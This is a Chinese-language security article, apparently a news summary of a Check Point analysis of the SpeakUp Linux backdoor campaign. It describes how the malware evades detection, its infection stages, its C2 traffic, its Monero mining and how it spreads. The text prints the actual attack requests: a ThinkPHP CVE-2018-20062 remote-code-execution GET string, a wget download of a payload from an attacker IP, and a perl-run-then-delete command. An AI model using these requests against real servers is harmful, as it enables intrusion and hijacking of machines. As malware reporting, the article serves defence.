日前，全球屈指一首的Internet安全解決方案供應商Check Point IT安全部門研究人員發現了一個通過目前Linux服務器漏洞植入后門木馬的黑客活動，此次攻擊的目標涵蓋了包括AWS主機在內的世界范圍的全部服務器。攻擊范圍涵蓋了共6個不同Linux發行版和macOS系統服務器中的已知漏洞，目前黑客的主要攻擊目標集中在東亞與拉美地區的Linux服務器。



　　全球SpeakUP“受害者”分部


　　這次的惡意攻擊的罪魁禍首被命名為SpeakUP，命名方式是以其中一臺命令與控制（C2）服務器名稱進行命名的。據悉Check Point的研究人員發現SpeakUP通過Linux服務器漏洞來植入后門木馬的攻擊方式可以繞過目前所有安全產品，這是由于該惡意軟件中存儲了大量此前出現過的攻擊案例，致使SpeakUP可以優先識別目前存在的安全漏洞，并成功繞過幾乎所有的殺毒軟件的“雙眼”。

　　
SpeakUP樣本采集

　　在Check Point的分析報告中顯示，首次發現的SpeakUP樣本是今年1月14日在我國的服務器上發現的，該樣本曾在1月9日被上傳至VirusTotal網站（專業的免費可疑文件分析服務網站）。但經過嚴密的監測后發現，沒有一家安全產品將SpeakUP惡意軟件標為惡意。



　　這是因為為了逃避安全檢測，SpeakUp的代碼采用了base64加鹽算法加密。不僅如此，C2通信也是采用了相同的方式加密。這也是為什么VirusTotal上的殺毒引擎無法將其檢測為惡意的原因所在。

　　
SpeakUP感染全過程：

　　植入腳本階段

　　根據Check Point報告中披露的數據來看，SpeakUP首先是利用ThinkPHP（輕量級PHP開發框架）的一個漏洞為攻擊起點，從中植入一個PHP shell腳本。

　　使用GET請求（如下所示），通過ThinkPHP遠程代碼執行漏洞CVE-2018-20062將shell腳本發送到目標服務器：

　　s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^
>index.php

　　這個shell腳本接下來會通過query中的“module”參數來執行命令。

　　植入后門階段

　　在腳本生效之后，SpeakUP將進行像服務器植入后門的操作

　　發送另一個HTTP請求（如下所示）到目標服務器：

　　/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

　　實際上，這是一個注入過程，目的是植入ibus payload并將其存儲到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc

　　啟動后門并抹除痕跡階段

　　在植入后門成功后，SpeakUP將對服務器發送請求，啟動后門，在啟動后門后SpeakUP將通過刪除文件來清楚自己的感染痕跡。

　　使用如下HTTP請求來執行后門：

　　/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc

　　
SpeakUP感染后果：

　　在Linux服務器被感染后，SpeakUP使用POST和GET請求來與C2通信，C2是被黑的speakupomaha[.]com.。

　　第一個post請求會發送受害者ID和其他介紹性的信息，比如安裝的腳本的當前版本等。

　　對應的C2響應是needrgr，表示受感染的受害者之前未在服務器上注冊，需要注冊。

　　之后，木馬會通過執行以下的Linux命令來POST機器的全部信息：

　　· Uname (-r, -v, -m, -n,-a, -s)

　　· Whoami

　　· Ifconfig –a

　　· Arp –a

　　· cat /proc/cpuinfo | grep -c “cpu family” 2>&1

　　· who –b



　　一旦受感染服務器注冊完成，C2服務器就會發送新的任務——不同的C2服務器會命名受感染服務器來下載和執行不同的文件。

　　有一個需要注意的點是，SpeakUP使用了User-Agent用戶代理。具體來說，SpeakUp定義了三個用戶代理，而受感染服務器在與C2服務器進行通信時必須使用這些代理。其中兩個代理是MacOS X User-Agent，第三個是經過哈希處理的字符串：

　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD

　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

　　E9BC3BD76216AFA560BFB5ACAF5731A3



　　目前，SpeakUp主要服務于XMRig礦工，為其提供“肉雞（受感染服務器）”。根據XMRHunter網站的查詢結果顯示，攻擊者的錢包目前擁有約107枚門羅幣。

　　
SpeakUP強大的自我傳播能力

　　攻擊者還為SpeakUp配備了一個“i”模塊，它實際上是一個python腳本，使得SpeakUP能夠掃描和感染位于受感染服務器所處內網和外網的其他更多的Linux服務器。其主要功能有：

　　使用預定義的用戶名和密碼來暴力破解嘗試登陸管理面板；

　　掃描受感染服務器的網絡環境，檢測共享相同內部和外部子網掩碼的服務器上的特定端口的可用性；

　　嘗試利用目標服務器上的遠程代碼執行漏洞